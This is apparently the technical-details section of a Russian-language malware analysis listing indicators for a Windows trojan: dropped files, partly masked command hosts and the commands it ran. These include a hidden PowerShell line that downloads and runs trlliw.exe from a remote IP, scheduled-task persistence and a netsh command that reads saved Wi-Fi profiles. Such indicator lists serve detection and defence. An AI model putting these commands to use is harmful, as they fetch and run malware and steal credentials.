Техническая информация
- <SYSTEM32>\tasks\updates\xlabyfygunc
- http://18#.#02.170.122/trlliw.exe как %appdata%\trlliw.exe
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\trlliw.exe
- trlliw.exe
- %TEMP%\dbdtfhgygeghdpВ .sct
- %APPDATA%\trlliw.exe
- %APPDATA%\xlabyfygunc.exe
- %TEMP%\tmpeff9.tmp
- %TEMP%\dbdtfhgygeghdpВ .sct
- %TEMP%\tmpeff9.tmp
- '18#.#02.170.122':80
- 'ch####p.dyndns.org':80
- 'ap#.##legram.org':443
- http://18#.#02.170.122/trlliw.exe
- http://ch####p.dyndns.org/
- 'ap#.##legram.org':443
- DNS ASK ch####p.dyndns.org
- DNS ASK ap#.##legram.org
- '%APPDATA%\trlliw.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://18#.#02.170.122/trlliw.exe','%APPDATA%\trlliw.exe')' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\trlliw.exe' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\XLabYFYguNC" /XML "%TEMP%\tmpEFF9.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\XLabYFYguNC" /XML "%TEMP%\tmpEFF9.tmp"
- '%WINDIR%\syswow64\netsh.exe' wlan show profile